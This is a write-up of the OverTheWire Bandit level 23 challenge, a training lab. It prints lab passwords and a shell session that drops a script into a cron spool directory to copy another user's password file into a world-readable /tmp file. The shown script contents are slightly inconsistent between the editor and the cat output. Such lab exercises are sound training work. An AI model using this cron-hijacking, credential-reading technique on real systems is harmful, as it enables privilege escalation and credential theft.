Over The Wire

Bandit

Host: bandit.labs.overthewire.org

Port: 2220

Level 23

ssh bandit23@bandit.labs.overthewire.org -p 2220
password: QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

Objective:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

CLI:

bandit23@bandit:~$ mkdir /tmp/rand
bandit23@bandit:~$ cd /tmp/rand
bandit23@bandit:/tmp/rand$ touch script.sh
bandit23@bandit:/tmp/rand$ ls
script.sh
bandit23@bandit:/tmp/rand$ nano script.sh
#!/bin/sh
chmod 777 pcdir123
bandit23@bandit:/tmp/rand$ touch password
bandit23@bandit:/tmp/rand$ cd ../
bandit23@bandit:/tmp$ chmod 777 rand
bandit23@bandit:/tmp$ cd rand
bandit23@bandit:/tmp/rand$ cat script.sh
cat /etc/bandit_pass/bandit24 > /tmp/rand/password
bandit23@bandit:/tmp/rand$ ls
password script.sh
bandit23@bandit:/tmp/rand$ chmod 777 script.sh
bandit23@bandit:/tmp/rand$ ls -la
total 408
drwxrwxrwx 2 bandit23 bandit23 4096 Apr 1 14:00 .
drwxrwx-wt 103 root root 405504 Apr 1 14:13 ..
-rwxrwxrwx 1 bandit23 bandit23 0 Apr 1 13:53 password
-rwxrwxrwx 1 bandit23 bandit23 63 Apr 1 13:53 script.sh
bandit23@bandit:/tmp/rand$ cp script.sh /var/spool/bandit24/foo
bandit23@bandit:/tmp/rand$ ls -la
total 408
drwxrwxrwx 2 bandit23 bandit23 4096 Apr 1 14:00 .
drwxrwx-wt 103 root root 405504 Apr 1 14:18 ..
-rwxrwxrwx 1 bandit23 bandit23 0 Apr 1 13:53 password
-rwxrwxrwx 1 bandit23 bandit23 63 Apr 1 13:53 script.sh
bandit23@bandit:/tmp/rand$ ls
password script.sh
bandit23@bandit:/tmp/rand$ cat password
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
bandit23@bandit:/tmp/rand$

Bandit